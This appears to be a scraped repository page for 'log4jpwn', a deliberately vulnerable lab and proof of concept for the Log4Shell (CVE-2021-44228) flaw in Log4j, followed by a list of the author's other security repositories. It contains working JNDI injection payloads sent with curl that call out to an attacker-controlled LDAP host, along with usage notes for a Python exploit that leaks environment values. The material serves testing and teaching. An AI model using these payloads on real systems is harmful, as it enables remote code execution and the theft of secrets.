• Stars
    star
    308
  • Rank 135,712 (Top 3 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created almost 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

log4j rce test environment and poc

log4jpwn

log4j rce test environment. See: https://www.lunasec.io/docs/blog/log4j-zero-day/

This repository contains an intentionally vulnerable playground to play with CVE-2021-44228 (aka: log4shell)

Experiments to trigger the vulnerability in various software products mentioned here can be found in the vuln-software/ directory.

examples

1

using the included python poc

2

build

Either build the jar on your host with mvn clean compile assembly:single

Or use docker to build an image with docker build -t log4jpwn .

run

The server will log 3 things (which are also the triggers). You don't have to set all 3:

  • The User-Agent header content
  • The request path
  • The pwn query string parameter

To use:

  • Run the container with docker run --rm -p8080:8080 log4jpwn (or the jar if you built on your host with java -jar target/log4jpwn-1.0-SNAPSHOT-jar-with-dependencies.jar)
  • Make a curl request with a poisoned User-Agent header with your payload. eg curl -H 'User-Agent: ${jndi:ldap://172.16.182.1:8081/a}' localhost:8080, where 172.16.182.1 is where my netcat lister is running.

A complete example for all 3 bits that gets logged:

curl -v -H 'User-Agent: ${jndi:ldap://192.168.0.1:443/a}' 'localhost:8080/${jndi:ldap://192.168.0.1:443/a}/?pwn=$\{jndi:ldap://192.168.0.1:443/a\}'

run - exploit

The python exploit will leak values. By default it will try ${java:version}, but you can specify anything with the --leak flag.

Usage is:

โฏ ./pwn.py --help
usage: pwn.py [-h] --target TARGET [--listen-host LISTEN_HOST] [--listen-port LISTEN_PORT] --exploit-host EXPLOIT_HOST [--leak LEAK]

a simple log4j <=2.14 information disclosure poc (ref: https://twitter.com/Black2Fan/status/1470281005038817284)

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        target uri
  --listen-host LISTEN_HOST
                        exploit server host to listen on (default: 127.0.0.1)
  --listen-port LISTEN_PORT, -lp LISTEN_PORT
                        exploit server port to listen on (default: 8888)
  --exploit-host EXPLOIT_HOST, -eh EXPLOIT_HOST
                        host where (this) exploit server is reachable
  --leak LEAK, -l LEAK  value to leak. see: https://twitter.com/Rayhan0x01/status/1469571563674505217 (default: ${java:version})

Example runs:

  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1
  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1 --leak '${env:SHELL}'
  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1 --listen-port 5555

More Repositories

1

awesome-nmap-grep

Awesome Nmap Grep
283
star
2

frida-boot

Frida Boot ๐Ÿ‘ข- A binary instrumentation workshop, with Frida, for beginners!
CSS
261
star
3

ooktools

๐Ÿ“ก On-off keying tools for your SD-arrrR
Python
128
star
4

qrxfer

Transfer files from Air gapped machines using QR codes
Python
93
star
5

dnsfilexfer

File transfer via DNS
Python
63
star
6

wordpress-shell

Cheap & Nasty Wordpress Command Execution Shell
PHP
63
star
7

hogar

A pluggable Telegram bot framework
Python
52
star
8

trauth

๐Ÿ”‘ A simple Traefik ForwardAuth server for HTTP Basic SSO
Go
30
star
9

tc2

treafik fronted c2 examples
Shell
25
star
10

dotfiles

โšก๏ธโ€ข files | Batteries included, dotfile configurations
Shell
16
star
11

PHPNessusNG

PHP wrapper functions for interfacing with the Nessus V6.x API
PHP
15
star
12

find-gw

๐Ÿ›ฐA bash script to check if you have a gateway that could get you somewhere nice.
Shell
14
star
13

public-talks

๐ŸŽค A collection of presentation materials for my public talks.
12
star
14

metasploit-modules

Various Metasploit Modules
Ruby
12
star
15

go-observe

๐ŸŒŒ Go-Observe: A command line Mozilla Observatory client written in Go
Go
12
star
16

socat23

๐Ÿ— Socat with SSL v2/3 Support
Shell
11
star
17

py2gource

py2gource
Python
11
star
18

pytel

A Pure Python telegram-cli Interface
Python
10
star
19

history-here

A zsh plugin to quickly isolate shell history recording.
Shell
9
star
20

longurl

A Command line URL Expander
Python
8
star
21

golert

๐Ÿšจan osquery powered, almost cross platform HIDS
Go
8
star
22

php-nessus-api

PHP wrapper functions for the Nessus API
PHP
8
star
23

nutstat

๐Ÿ”Œ a Network UPS Tools (NUT) to InfluxDB exporter, written in Go
Go
6
star
24

weblick

A Web Information Gathering Tool
Python
6
star
25

filesmudge

a silly file 'smudger'
Python
5
star
26

KaliDocker

Kali Docker Image
5
star
27

tli

Twitter (command) Line Interface
Python
4
star
28

PHP-ShockPot

Poor Man's Shellshock Honeypot
PHP
3
star
29

godoh-clients

various godoh client experiments
C
3
star
30

php-gitlab-jabberhook

A small library to parse Gitlab Webhooks and notify via XMPP
PHP
3
star
31

elk-docker

ELK stack in Docker, with documentation issues fixed.
Shell
3
star
32

adventofcode

adventofcode
Python
2
star
33

codeql-vuln-blog

Intentionally Vulnerable Blog Web Application
Python
2
star
34

not-infosec-twitter

Not Infosec Twitter
2
star
35

leonjza.github.io

๐Ÿฑโ€๐Ÿ‘ค A checkbox Uncheckers' Notepad
Shell
2
star
36

minigrep

๐Ÿฆ€ Rust Documentation Walkthrough - minigrep
Rust
1
star
37

dockerfiles

๐Ÿค– A collection of dockerfiles
Shell
1
star
38

docker-elk

docker-elk repo, using the https://github.com/deviantony/docker-elk template
Dockerfile
1
star
39

flick-check

The Flick II Vulnerable VM Android Application
Java
1
star
40

composer-shell

A silly reverse shell invoked via the Composer Dependency Manager
PHP
1
star
41

codeql-uboot

CodeQL
1
star
42

leonjza-octopress.github.io

A checkbox Uncheckers' Notepad
HTML
1
star
43

hasher

Hasherโ„ข is a completely client side password generator.
CSS
1
star
44

cvestream

a small utility to dump NVD information
Python
1
star
45

eskom-loadshedding-status

Eskom LoadShedding Status Bot
Python
1
star